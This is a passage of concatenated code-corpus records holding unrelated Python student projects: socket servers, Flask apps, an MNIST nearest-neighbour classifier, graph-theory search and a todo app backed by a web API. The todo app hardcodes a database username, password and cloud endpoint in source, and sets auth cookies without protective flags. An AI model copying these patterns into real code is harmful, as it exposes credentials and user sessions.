super(Ultra96_client, self).__init__()\n self.shutdown = threading.Event()\n\n # synchronization data structures for laptop <=> ultra96\n self.laptop_data_queue = deque()\n self.laptop_data_map = {}\n self.laptop_data_map[0] = deque()\n self.laptop_data_map[1] = deque()\n self.laptop_data_map[2] = deque()\n\n self.laptop_positional_data_map = {}\n self.laptop_positional_data_map[0] = deque()\n self.laptop_positional_data_map[1] = deque()\n self.laptop_positional_data_map[2] = deque()\n\n # connect to the laptops\n self.init_connections_to_laptops()\n\n # just block. Find some condition for this such as after sending the logout action\n while True:\n time.sleep(5)\n\n \"\"\"\n Terminates the programme after necessary communications with\n Ultra96 have been done\n \"\"\"\n self.stop() \n\n def init_connections_to_laptops(self):\n print(\"Ultra96 server is starting up to receive connections from 3 dancer laptops\")\n self.xilinx_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.xilinx_ip_addr = \"137.132.86.241\"\n self.xilinx_socket.bind((self.xilinx_ip_addr, 14899))\n self.xilinx_socket.listen(12)\n\n # I'm accepting connections from 3 laptops only\n laptop_connection_counter = 0;\n while True:\n laptop_socket, laptop_address = self.xilinx_socket.accept()\n laptop_socket.settimeout(20)\n print(f\"Connection from {laptop_address} has been established\");\n if DATA_COLLECTION_MODE:\n print(\"Data collection is starting now\")\n FILE_WRITE_START_TIME = time.time()\n FILE_WRITE_END_TIME = time.time() + 60 * 3\n # spawn a file writer thread\n laptop_connection_counter += 1\n self.laptop1_connected_timing = time.time()\n if laptop_connection_counter <= MAX_LAPTOP_CONNECTIONS:\n # spawn 1 thread for the each connection\n thread = Thread(target=self.receive_data_from_laptop, args=(laptop_connection_counter, laptop_socket, laptop_address))\n thread.daemon=True\n thread.start()\n if laptop_connection_counter == MAX_LAPTOP_CONNECTIONS:\n print(f\"==== {MAX_LAPTOP_CONNECTIONS} Laptops have been connected with the Ultra96 ====\")\n break;\n else:\n print(f\"Warning: more than {MAX_LAPTOP_CONNECTIONS} connections are established\")\n break;\n print(\"end of init connections from laptop\")\n while True:\n time.sleep(10)\n\n \"\"\"\n One thread will be spawned with this method for each laptop connection.\n It will receive the data from the laptop and put it into a \n global queue shared by all such threads to house all data from laptops\n \"\"\"\n def receive_data_from_laptop(self, id, laptop_socket, laptop_addr):\n print(f\"thread {id} has started\")\n sql_data_dropper = 0\n while True:\n try:\n msg = laptop_socket.recv(512)\n curr_time = time.time()\n if (curr_time - 0 >= self.laptop1_connected_timing) and msg:\n full_msg = self.decrypt_message_from_laptop(msg)\n print(full_msg)\n # extract the data out here\n data_type = int(full_msg.split(\"|\")[1])\n if data_type == 0:\n packed_data = self.extract_and_pack_data_from_laptop(full_msg)\n self.laptop_data_queue.append(packed_data)\n self.data_collection_list.append(packed_data)\n self.laptop_data_map[id - 1].append(packed_data)\n #pack_for_sql_data = self.pack_data_for_sql(packed_data)\n if sql_data_dropper % 5 == 0:\n self.sql_data_queue.append(packed_data)\n # print(\"pushed data into sql queue\")\n # else:\n # print(\"----Data dropped for sql---\")\n sql_data_dropper += 1\n if not CONNECT_TO_EVAL_SERVER:\n print(f\"data received {id}: {packed_data}\")\n if msg.decode(\"utf-8\") == \"bluno_over\":\n print(f\"Closing the socket connection 
to {laptop_addr}\")\n break\n elif data_type == 1:\n positional_data = float(full_msg.split(\"|\")[2])\n self.laptop_positional_data_map[id - 1].append(positional_data)\n else:\n print(f\"Data type should never enter this state: {data_type}\")\n elif msg:\n print(\"dropped packet\")\n except Exception as e:\n print(\"=========\")\n print(f\"Exception has occurred in receiver thread {id}\")\n print(e)\n print(\"=========\")\n # direct data that are dance packets to this metho\n \n \"\"\"\n This function extracts the dance sensor values and packs it for shreyas AI\n Also, it updates the start timing in the dancer's time map\n \"\"\"\n def extract_and_pack_data_from_laptop(self, full_msg):\n data = full_msg.split(\"|\")\n laptop_id = data[0][1:]\n a_x = float(data[6])\n a_y = float(data[7])\n a_z = float(data[8])\n g_x = float(data[3])\n g_y = float(data[4])\n g_z = float(data[5])\n packet_marker = data[9]\n curr_time = data[2]\n if packet_marker == \"a\":\n if laptop_id in self.start_time_map_dancers:\n if self.start_time_map_dancers[laptop_id] == -1:\n self.start_time_map_dancers[laptop_id] = curr_time\n else:\n self.start_time_map_dancers[laptop_id] = curr_time\n return [g_x, g_y, g_z, a_x, a_y, a_z]\n\n def pack_data_for_sql(self, data):\n return (data[0], data[1], data[2], data[3], data[4], data[5], \"2008-11-11\", \"2008-11-11\")\n\n def decrypt_message_from_laptop(self, message):\n message = message.decode(\"utf-8\").strip()\n #message = message.strip()\n decoded_message = base64.b64decode(message)\n iv = decoded_message[:16]\n secret_key = bytes(LAPTOP_ULTRA96_SECRET_KEY, encoding=\"utf-8\")\n cipher = AES.new(secret_key, AES.MODE_CBC, iv)\n decrypted_message = cipher.decrypt(decoded_message[16:]).strip()\n decrypted_message = decrypted_message.decode(\"utf8\")\n return decrypted_message\n \n \"\"\"\n Cleans up resources\n Terminates the programme\n \"\"\"\n \n def stop(self):\n self.end = False;\n while True:\n if not self.end:\n time.sleep(3)\n else:\n break\n self.xilinx_socket.close();\n print(\"socket closed\");\n #self.socket.close()\n sys.exit()\n\ndef main():\n if len(sys.argv) != 3:\n print(\"Invalid number of arguments\")\n print('python ultra96_client.py [IP address] [Port]')\n sys.exit()\n \n ip_addr = sys.argv[1]\n port_num = int(sys.argv[2])\n\n ## connect to the evaluation server \n my_client = Ultra96_client(ip_addr, port_num)\n my_client.start()\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"comms_external/helper/Debug1/u96.py","file_name":"u96.py","file_ext":"py","file_size_in_byte":9671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"487209242","text":"#!/usr/bin/python3\n\"\"\"Module\"\"\"\nfrom flask import Flask, render_template\nfrom models import storage\nfrom models.state import State\nfrom models.city import City\n\napp = Flask(__name__)\n\n\n@app.teardown_appcontext\ndef db_close(self):\n \"\"\"close session\"\"\"\n storage.close()\n\n\n@app.route('/hbnb_filters', strict_slashes=False)\ndef showFilters():\n states = storage.all('State')\n cities = storage.all('City')\n amenities = storage.all('Amenity')\n return render_template('10-hbnb_filters.html', states=states,\n cities=cities, amenities=amenities)\n\n\nif __name__ == '__main__':\n app.run('0.0.0.0', 5000)\n","sub_path":"web_flask/10-hbnb_filters.py","file_name":"10-hbnb_filters.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} 
+{"seq_id":"127300575","text":"import csv\nfrom pprint import pprint\nimport datetime\n\n\n# def release_days(cast, dates, actors):\n\ndef release_days(cast, dates, actors):\n cast_lis = open(cast, newline='')\n cast_reader = csv.reader(cast_lis)\n cast_header = next(cast_reader)\n cast_data = [row for row in cast_reader]\n print(cast_header)\n titles = set()\n for ac in actors:\n name = ac.lower()\n for d in cast_data:\n if d[2].lower() == name:\n titles.add(d[0])\n # pprint(titles)\n\n # Data search by actor.\n # t_set = set()\n # for d in cast_data:\n # if d[2].lower() == 'meg ryan' or d[2].lower() == 'tom hanks':\n # # t_set.add(d[0])\n # print(d)\n # pprint(t_set)\n\n # Dates and shit.\n # Filter by USA releses.\n dates_lis = open(dates, newline='')\n dates_reader = csv.reader(dates_lis)\n dates_header = next(dates_reader)\n dates_data = [row for row in dates_reader]\n dat = []\n print(dates_header)\n for d in dates_data:\n if d[0] in titles and d[2] == 'USA':\n sdfg = d[3].split('-')\n ye, mo, da = sdfg\n dat.append(dict({d[0]: datetime.date(int(ye), int(mo), int(da))}))\n pprint(dat)\n # dick = dict()\n # for i in range(1, 8):\n # result = set()\n # for df in dat:\n # if wert.weekday() + 1 == i:\n # result.add(df.keys())\n # if len(result) > 0:\n # dick[i] = result\n # pprint(dick)\n\n # for i, df in enumerate(dat):\n # dic_lis = set()\n # ye, mo, da = df[1]\n # wert = datetime.date(int(ye), int(mo), int(da))\n # if wert.weekday() == i:\n # dic\n # dick.update({wert.weekday(): d[0]})\n # print(dick)\n # # print(ye, mo, da)\n\nprint(release_days(\n './data/cast.csv', './data/dates.csv', ['Tom Hanks', 'Meg Ryan']))\n# {2: {'Kate & Leopold'},\n# 3: {'A League of Their Own',\n# 'Catch Me If You Can',\n# 'Forrest Gump',\n# 'Innerspace',\n# 'Nothing in Common',\n# 'The Money Pit',\n# 'The Polar Express',\n# 'Toy Story',\n# 'Toy Story 2'},\n# 5: {'Addicted to Love',\n# 'Against the Ropes',\n# 'Amityville 3-D',\n# 'Anastasia',\n# 'Angels & Demons',\n# 'Apollo 13',\n# 'Armed and Dangerous',\n# 'Bachelor Party',\n# 'Big',\n# 'Bridge of Spies',\n# 'Captain Phillips',\n# 'Cars',\n# 'Cast Away',\n# \"Charlie Wilson's War\",\n# 'City of Angels',\n# 'Cloud Atlas',\n# 'Courage Under Fire',\n# 'D.O.A.',\n# 'Dragnet',\n# 'Extremely Loud & Incredibly Close',\n# 'Flesh and Bone',\n# 'French Kiss',\n# 'Hanging Up',\n# \"He Knows You're Alone\",\n# 'Hurlyburly',\n# 'In the Cut',\n# 'In the Land of Women',\n# \"Io sono l'amore\",\n# 'Joe Versus the Volcano',\n# 'Larry Crowne',\n# 'Philadelphia',\n# 'Prelude to a Kiss',\n# 'Proof of Life',\n# 'Punchline',\n# 'Radio Flyer',\n# 'Restoration',\n# 'Road to Perdition',\n# 'Saving Mr. 
Banks',\n# 'Saving Private Ryan',\n# 'Serious Moonlight',\n# 'Sleepless in Seattle',\n# 'Splash',\n# 'Sully',\n# 'That Thing You Do!',\n# \"The 'Burbs\",\n# 'The Bonfire of the Vanities',\n# 'The Da Vinci Code',\n# 'The Doors',\n# 'The Great Buck Howard',\n# 'The Green Mile',\n# 'The Ladykillers',\n# 'The Man with One Red Shoe',\n# 'The Presidio',\n# 'The Queen',\n# 'The Simpsons Movie',\n# 'The Terminal',\n# 'Top Gun',\n# 'Toy Story 3',\n# 'Turner & Hooch',\n# 'Volunteers',\n# 'When Harry Met Sally...',\n# 'When a Man Loves a Woman',\n# \"You've Got Mail\"},\n# 7: {'I.Q.'}}\n","sub_path":"prla/assignments/a2/release_days.py","file_name":"release_days.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"373089789","text":"import pandas as pd\nimport pyodbc\n\n# This line ensures that the connection closes after running the connection string\npyodbc.pooling = False\n\nclass SQLServer_connection:\n\n def __init__(self,sql_code):\n self.sql_code = sql_code\n\n def db_connect(self, run_date = None):\n self.run_date = run_date\n # parameters to pass to the connection string for connecting to the database\n connection_variables = {'DRIVER':'{SQL Server}',\n 'SERVER':'Insert server details',\n 'DATABASE':'database name',\n 'PWD':\"database password\",\n 'PORT':'port number',\n 'trusted_connection':'yes'}\n\n try:\n # connection string to be passed into pyodbc\n connection_string = ('DRIVER='+connection_variables['DRIVER']+';SERVER='+connection_variables['SERVER']+\n ';PORT='+connection_variables['PORT']+';DATABASE='+connection_variables['DATABASE']+\n ';trusted_connection='+connection_variables['trusted_connection']+';PWD='+connection_variables['PWD'])\n\n # open database connection using the connection string\n conn = pyodbc.connect(connection_string)\n\n if run_date != None:\n # if pull the data for a specified date\n # the date will be stored in the param variable\n # note that the date should be in the same format as stored in the database\n param = [self.run_date]\n data = pd.read_sql(self.sql_code,conn,params=param)\n # close connection\n conn.close()\n return data\n else:\n # cursor.execute(self.sql_code)\n # Fetch all the data\n # data = cursor.fetchall()\n data = pd.read_sql(self.sql_code,conn)\n # close connection\n conn.close()\n return print(data)\n except:\n print(\"Connection unsuccessful.\\n\"\n \"Check if you have entered the correct information for database connection string.\")\n\n\n\n#######################################################################################################################\n# Example of how to use the code #\n#######################################################################################################################\n\n# running the sql code without the date specified\n# Type your SQL code below\nsql_code = ('''SELECT *\\\n FROM INSERT_YOUR_TABLE_NAME\\\n WHERE INSERT_WHERE_CLAUSE\n ''')\nconnection = SQLServer_connection(sql_code)\ndata = connection.db_connect()\n\n# if you want to pull data for a specified date\nsql_code2 = ('''SELECT *\\\n FROM INSERT_YOUR_TABLE_NAME\\\n WHERE INSERT_WHERE_CLAUSE AND DATE_VARIABLE = CAST (? 
AS datetime)\n ''')\ndate_example = '2019/02/19'\n\nconnection = SQLServer_connection(sql_code2)\ndata2 = connection.db_connect(date_example)\n","sub_path":"pyodbc examples/sqlserver_pyodbc.py","file_name":"sqlserver_pyodbc.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"34775717","text":"import os\nimport glob\nimport torch\nimport torch.nn.parameter\nfrom datetime import datetime\nfrom gym import wrappers\n\n\ndef mkdir(path):\n \"\"\"if needed create a folder at given path\"\"\"\n if not os.path.exists(path):\n os.makedirs(path)\n return path\n\n\ndef get_current_date_time():\n \"\"\"get current datetime as string in the form of Y_m_d_H_M_S\"\"\"\n current_date_time = datetime.now().strftime('%Y/%m/%d %H:%M:%S')\n current_date_time = current_date_time.replace(\" \", \"__\").replace(\"/\", \"_\").replace(\":\", \"_\")\n return current_date_time\n\n\ndef save_state_dict(checkpoint_dir, state_dict):\n \"\"\"Save the network weights\"\"\"\n mkdir(checkpoint_dir)\n current_date_time = get_current_date_time()\n torch.save(state_dict, os.path.join(checkpoint_dir, \"ckpt_\" + current_date_time))\n\n\ndef load_latest_available_state_dict(checkpoint_dir):\n list_of_files = glob.glob(checkpoint_dir)\n latest_file = max(list_of_files, key=os.path.getctime)\n return torch.load(latest_file)\n\n\ndef load_partial_state_dict(state_dict, target_state_dict):\n for name, param in state_dict.items():\n if name in target_state_dict:\n param = param.data\n target_state_dict[name].copy_(param)\n return state_dict\n\n\ndef set_up_monitoring(env, config):\n \"\"\"wrap the environment to allow rendering and set up a save directory\"\"\"\n path = os.path.join(\".\", *config[\"monitor_dir\"], config[\"env_name\"])\n mkdir(path)\n current_date_time = get_current_date_time()\n current_date_time = current_date_time.replace(\" \", \"__\").replace(\"/\", \"_\").replace(\":\", \"_\")\n env = wrappers.Monitor(env, os.path.join(path, current_date_time))\n return env\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"619614164","text":"import numpy as np\nimport collections\n\ndef train():\n with open(\"train-labels.idx1-ubyte\", mode='rb') as trainLabelFile:\n with open(\"train-images.idx3-ubyte\", mode=\"rb\") as trainImageFile:\n trainLabelFile.seek(4) # jump over the magic number\n trainImageFile.seek(4)\n s1 = trainLabelFile.read(4) # the amount of items\n s2 = trainImageFile.read(4)\n number = int.from_bytes(s1, byteorder=\"big\")\n\n number = int(number)\n print(number)\n rows = int.from_bytes(trainImageFile.read(4), byteorder=\"big\") # get rows and columns\n columns = int.from_bytes(trainImageFile.read(4), byteorder=\"big\")\n\n Images = [] # data struct to save the data\n Labels = []\n for i in range(0,number):\n Images.append(np.array([0]))\n Labels.append(0)\n\n for i in range(0, number): # get the data\n if i % 100 == 0:\n print(i)\n label = int.from_bytes(trainLabelFile.read(1), byteorder=\"big\")\n image = []\n for j in range(0, rows * columns):\n image.append(int.from_bytes(trainImageFile.read(1), byteorder=\"big\"))\n Labels[i] = label\n Images[i] = np.array(image)\n Images[i].shape = (28 * 28, 1)\n\n return(Labels,Images)\n\n\n\n\ndef test(Labels,Images):\n with open(\"t10k-images.idx3-ubyte\", mode=\"rb\") as testImageFile:\n with open(\"t10k-labels.idx1-ubyte\", 
mode=\"rb\") as testLabelFile:\n            testLabelFile.seek(4) # jump over the magic number\n            testImageFile.seek(4)\n            s1 = testLabelFile.read(4) # the amount of items\n            s2 = testImageFile.read(4)\n            number = int.from_bytes(s1, byteorder=\"big\")\n\n            number = int(number);\n            rows = int.from_bytes(testImageFile.read(4), byteorder=\"big\") # get rows and columns\n            columns = int.from_bytes(testImageFile.read(4), byteorder=\"big\")\n\n            testImages = [] # data struct to save the data\n            testLabels = []\n            for i in range(0, number):\n                testImages.append(np.array([0]))\n                testLabels.append(0)\n\n            for i in range(0, number): # get the data\n                if i % 100 == 0:\n                    print(i)\n                label = int.from_bytes(testLabelFile.read(1), byteorder=\"big\")\n                image = []\n                for j in range(0, rows * columns):\n                    image.append(int.from_bytes(testImageFile.read(1), byteorder=\"big\"))\n                testLabels[i] = label\n                testImages[i] = np.array(image)\n                testImages[i].shape = (28 * 28, 1)\n\n\n    resultFile = open(\"resultfile-3NN.txt\",mode=\"w+\",encoding=\"utf-8\")\n    sameCount = 0\n\n    for i in range(0,number):\n        if i % 100 == 0:\n            print(\"number: \"+str(i))\n        finalResult=0\n        firstThree = [float(\"inf\")]*3\n        firstThreeLabel = [0]*3\n\n        for j in range(0,len(Labels)):\n            temp = np.linalg.norm(testImages[i]-Images[j])\n            biggest,pos = find_biggest(firstThree)\n            if temp < biggest: # keep the three smallest distances seen so far\n                firstThree[pos] = temp\n                firstThreeLabel[pos] = Labels[j]\n        finalResult = getPopular(firstThreeLabel) # majority vote of the 3 nearest neighbours\n        resultFile.write(str(finalResult)+\"\\n\")\n        if finalResult == testLabels[i]:\n            sameCount += 1\n    print(\"accuracy: \"+str(sameCount/number))\n    resultFile.close()\n\ndef find_biggest(lst):\n    biggest = lst[0]\n    pos = 0\n    for i in range(0,len(lst)):\n        if lst[i] > biggest:\n            biggest=lst[i]\n            pos=i\n    return biggest,pos\n\ndef getPopular(lst):\n    counter = collections.Counter(lst)\n    most_common = counter.most_common(1)\n    return most_common[0][0]\n\nif __name__ == \"__main__\":\n    Labels,Images = train()\n    test(Labels,Images)\n","sub_path":"homework2/编程作业/3NN.py","file_name":"3NN.py","file_ext":"py","file_size_in_byte":4087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"347042872","text":"from igraph import *\nfrom itertools import *\nfrom random import random\nimport math\n\n#Parameters for extremal calculation\nn = 8\nmtarget = 24\n#g is our test graph\ng = Graph(directed = True) \ng.add_vertices(n)\n#We can assume it contains a P_4\ng.add_edges([(0,1),(1,2),(2,3)])\n\ni = Graph(directed = True) #we compute ex(n,i)\ni.add_vertices(5)\ni.add_edges([(0,1),(1,2),(2,3),(3,4)]) #P_5\nj = Graph(directed = True)\nj.add_vertices(4)\nj.add_edges([(0,1),(1,2),(2,3),(3,0)]) #C_4\n#note that n should be >= 5 for the C_4-free assumption (for ex, for EX we need >= 9)\n\n#These are all the candidate edges\nedges = []\nfor x in permutations(range(0, n),2):\n    edges.append(x)\nfor a in range(0,3):\n    edges.remove((a, a+1))\nedges.remove((3,0)) #We can assume it's C_4-free\nfor a in range(4,n):\n    edges.remove((a,0))\n    edges.remove((3,a)) #either of these make a P_5\n\n##loading bar code\n#numberofcanidateedges = len(edges)\n#numberofcombinations = math.factorial(numberofcanidateedges)/ (math.factorial(m-3) * math.factorial(numberofcanidateedges - m + 3))\n#a = 0\n#b = 0\n#c = 1000\n#\n##the checking loop\n#edgestobeadded = []\n#for x in combinations(edges, m - 3):\n#    edgestobeadded = list(x)\n#    g.add_edges(edgestobeadded)\n#    # Checks if g has a copy of i using the vf2 algorithm\n#    if not g.subisomorphic_vf2(i):\n#        ifreegraphs.append(g.copy())\n#    g.delete_edges(None)\n#    g.add_edges([(0,1),(1,2),(2,3)])\n#    a = a + 1\n#    if a/numberofcombinations * c >= b:\n#        print(b/c)\n#        b = b + 1\n\n#data structures necessary to the algorithm\ncheck = True\nifreegraphs = []\nifreeisos = [g]\nedgestoreverse = []\nl = Graph(directed = True)\nl.add_vertices(n)\nmaximalityedges = []\nkill = False\n\nfor m in range(3, mtarget + 1): \n    
print(\"Working on \", m)\n #remove duplicates up to isomorphism and converse\n ifreegraphs = list(set(ifreegraphs))\n print(\"Choosing representatives up to isomorphism for\", len(ifreegraphs), \"graphs\")\n check = True\n for h in ifreegraphs:\n for k in ifreeisos:\n if h.isomorphic(k):\n check = False\n if check:\n ifreeisos.append(h)\n check = True\n ifreegraphs = ifreeisos\n ifreeisos = []\n print(\"Clearing duality for\", len(ifreegraphs), \"graphs\")\n for h in ifreegraphs:\n for k in ifreeisos:\n l.add_edges([(b,a) for (a,b) in k.get_edgelist()])\n if h.isomorphic(k) or h.isomorphic(l):\n check = False\n l.delete_edges(None)\n if check:\n ifreeisos.append(h)\n check = True\n\n print(\"Now at\", len(ifreeisos),\"representatives\")\n\n #reset graphs for the next layer\n ifreegraphs = []\n if kill:\n ifreeisos = []\n \n #find the next layer\n for k in ifreeisos:\n maximalityedges = list(set(edges) - set(k.get_edgelist()))\n for e in maximalityedges:\n k.add_edges([e])\n if (not k.subisomorphic_vf2(i)) and (not k.subisomorphic_vf2(j)):\n ifreegraphs.append(k.copy())\n k.delete_edges([e])\n\n #reset the isos for the next layer\n if ifreegraphs:\n ifreeisos = []\n else:\n kill = True\n\n#print graphs\nfor h in ifreeisos:\n print(h)\nif ifreeisos:\n print(\"ex(\",n,\",P_5) =\",mtarget)\nelse:\n if kill:\n print(\"ex(\",n,\",P_5) <\", mtarget)\n else:\n print(\"ex(\",n,\",P_5) >\", mtarget)\n\n\n","sub_path":"p5-case/inductive-p5.py","file_name":"inductive-p5.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"619126582","text":"#coding=utf-8\n\n\nclass Solution(object):\n def intersection(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: List[int]\n \"\"\"\n set1 = set(nums1)\n set2 = set(nums2)\n\n return list(set1 & set2)\n\nif __name__ == '__main__':\n solution = Solution()\n print(solution.intersection([1, 2, 3, 2], [1, 3, 4]))\n\n\n\n","sub_path":"0349-Intersection of Two Arrays/python-0349/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"541659301","text":"'''\nCreated on Nov 2, 2013\n\n@author: shengeng\n'''\nfrom django.conf.urls import patterns, url\n\nfrom knowledge import views\n\nurlpatterns = patterns('',\n url(r'^add/$', views.KnowledgeFormView.as_view(success_url='/knowledge/add/')),\n url(r'^collect/',views.collectknowl, name='collectknowl'),\n url(r'^listcollect/',views.list_collection, name='list_collection'),\n url(r'^webview/$', views.web_view),\n url(r'^list/', views.list_knowledge, name='knowledge list view'),\n url(r'^cancel/',views.cancelknowl, name='cancelknowl'),\n)\n","sub_path":"knowledge/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"430182303","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/4/22 10:16\n# @Author : Hanwei Zhu\n# @File : environment.py\n\n\nclass GameEnv(object):\n def __init__(self, conf):\n self.conf = conf\n self._w = self.conf[\"sustain_weight\"]\n print(\"Game start!\")\n self.common_resource_pool = self.conf[\"resource_capacity_init\"]\n\n def growth_func(self, n):\n rg = self.conf[\"replenishment_rate\"]\n return rg * n * (1 - n / self.conf[\"resource_capacity_n_max\"])\n\n def harvest_func(self, effort, n):\n return 
self.conf[\"beta\"] * (effort ** self.conf[\"alpha\"]) * (n ** (1 - self.conf[\"alpha\"]))\n\n def reward_func(self, delta_n, pi_list):\n rewards = []\n\n if delta_n > 0:\n sustainability_goal = 1\n elif delta_n == 0:\n sustainability_goal = 0\n else:\n sustainability_goal = -1\n\n for pi in pi_list:\n if pi > 0:\n wealth_goal = 1\n elif pi == 0:\n wealth_goal = 0\n else:\n wealth_goal = -1\n r = self._w * sustainability_goal + (1 - self._w) * wealth_goal\n rewards.append(r)\n\n return rewards\n\n def step(self, efforts):\n\n effort_sum = sum(efforts)\n\n # interact with environment\n harvest_level = self.harvest_func(effort_sum, self.common_resource_pool)\n delta_n = int(self.growth_func(self.common_resource_pool) - harvest_level)\n self.common_resource_pool += delta_n\n\n # get feedback from env\n pi_list = list(map(lambda x: x / float(effort_sum) * harvest_level - self.conf[\"cost_c\"] * x, efforts))\n pi_sum = sum(pi_list)\n\n game_is_done = False\n if self.common_resource_pool <= 5.0:\n game_is_done = True\n\n next_states = []\n for index, (x, pi) in enumerate(zip(efforts, pi_list)):\n next_states.append([x, pi_list[index], effort_sum, pi_sum])\n\n return next_states, self.reward_func(delta_n, pi_list), game_is_done\n\n def reset(self):\n self.common_resource_pool = self.conf[\"resource_capacity_init\"]\n","sub_path":"environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"588089741","text":"from flask import Flask, render_template, request, jsonify, url_for, json, redirect, make_response\nimport os\nimport requests\nfrom flask_sqlalchemy import SQLAlchemy\n\n# create flask app\napp = Flask(__name__)\n\n#setting up db config\nusername = \"todoflaskapp\"\npassword = \"todoflaskapp\"\nendpoint = \"todoflaskapp-db.cejj8nvffgy6.us-east-1.rds.amazonaws.com\"\ndb_instance_name = \"todoflaskapp-db\"\nuri = 'mysql://{}:{}@{}:3306/{}'.format(username, password, endpoint,db_instance_name)\napp.config['SQLALCHEMY_DATABASE_URI'] = uri\ndb = SQLAlchemy(app)\n\n@app.route('/')\ndef index():\n SITE_ROOT = os.path.realpath(os.path.dirname(__file__))\n json_url = os.path.join(SITE_ROOT, \"data\", \"data.json\")\n data = json.load(open(json_url))\n return render_template('index.html', todos=data)\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if request.method == 'POST':\n username = request.form['username']\n if username:\n url = 'https://hunter-todo-api.herokuapp.com/auth'\n payload = {\"username\":username}\n r = requests.post(url, json=payload)\n print(\"Retrieved Cookie: \", r.cookies)\n jar = r.cookies\n \n #if authenticated then get user's todo list\n if r.status_code == 200:\n todo_list = get_todo_list(jar)\n\n #store cookie to server \n response = make_response(render_template('index.html', username=username, todo_list=todo_list))\n key = 'sillyauth'\n val = r.cookies[key]\n #print(key, val)\n response.set_cookie(key, val)\n response.set_cookie('username', username)\n return response\n\n return render_template('login.html')\n\n@app.route('/logout')\ndef logout():\n return render_template('logout.html')\n\n@app.route('/createuser', methods=['GET', 'POST'])\ndef createUser():\n if request.method == 'POST':\n username = request.form['username']\n url = 'https://hunter-todo-api.herokuapp.com/user'\n payload = {'username': username}\n r = requests.post(url, json=payload)\n print(r.text)\n return render_template('login.html')\n return 
render_template('createUser.html')\n\n@app.route('/add', methods=['POST'])\ndef add():\n if request.method == 'POST':\n #retrieve stored cookie\n username = request.cookies.get('username')\n key = 'sillyauth'\n val = request.cookies.get(key)\n jar = requests.cookies.RequestsCookieJar()\n jar.set(key, val, domain='hunter-todo-api.herokuapp.com')\n \n #post the new item\n item = request.form['new_todo_item']\n #print(item)\n url = 'https://hunter-todo-api.herokuapp.com/todo-item'\n payload = {'content':item}\n r = requests.post(url, cookies=jar, json=payload)\n #print(r.status_code)\n\n #get updated todolist\n todo_list = get_todo_list(jar)\n\n #render index with new item\n if r.status_code == 201 and todo_list:\n return render_template('index.html', username=username, todo_list=todo_list)\n\n return render_template('login.html')\n \n@app.route('/completed', methods=['POST'])\ndef completed():\n if request.method == 'POST':\n #retrieve stored cookie\n username = request.cookies.get('username')\n #print(username)\n key = 'sillyauth'\n val = request.cookies.get(key)\n jar = requests.cookies.RequestsCookieJar()\n jar.set(key, val, domain='hunter-todo-api.herokuapp.com')\n #print(jar)\n\n #get item id\n if request.form.get('item_id'):\n item_id = request.form['item_id']\n print(\"item_id\", item_id)\n\n #mark item as completed\n url = 'https://hunter-todo-api.herokuapp.com/todo-item/' + item_id\n payload = {\"completed\":True}\n r = requests.put(url, json=payload, cookies=jar)\n\n #get updated todolist\n todo_list = get_todo_list(jar)\n\n return render_template('index.html', username=username, todo_list=todo_list)\n \n\n username = request.cookies.get('username')\n todo_list = get_todo_list(jar)\n return render_template('index.html', username=username, todo_list=todo_list)\n\n@app.route('/delete', methods=['POST'])\ndef delete():\n if request.method == 'POST':\n #retrieve stored cookie\n username = request.cookies.get('username')\n key = 'sillyauth'\n val = request.cookies.get(key)\n jar = requests.cookies.RequestsCookieJar()\n jar.set(key, val, domain='hunter-todo-api.herokuapp.com')\n \n #get item id\n if request.form.get('item_id'):\n item_id = request.form['item_id']\n #print(\"item_id\", item_id)\n\n #delete item\n url = 'https://hunter-todo-api.herokuapp.com/todo-item/' + item_id\n r = requests.delete(url, cookies=jar)\n\n #get updated todolist\n todo_list = get_todo_list(jar)\n\n return render_template('index.html', username=username, todo_list=todo_list)\n \n\n username = request.cookies.get('username')\n todo_list = get_todo_list(jar)\n return render_template('index.html', username=username, todo_list=todo_list)\n\ndef get_todo_list(cookie_jar):\n todo_items_url = 'https://hunter-todo-api.herokuapp.com/todo-item'\n r = requests.get(todo_items_url, cookies=cookie_jar)\n return r.json()\n\n\nif __name__ == \"__main__\":\n port = int(os.environ.get(\"PORT\", 5000))\n app.run(host=\"0.0.0.0\", port=port, threaded=True, debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"519489218","text":"USERS = dict(\n # Twitter usernames\n paulweveritt=dict(\n id='paulweveritt',\n email='p@x.com',\n first_name='Firstie',\n last_name='Lastie',\n twitter='paulweveritt'\n ),\n stormfburg=dict(\n id='stormfburg',\n email='p@x.com',\n first_name='STORM',\n last_name='Fburg',\n twitter='stormfburg'\n 
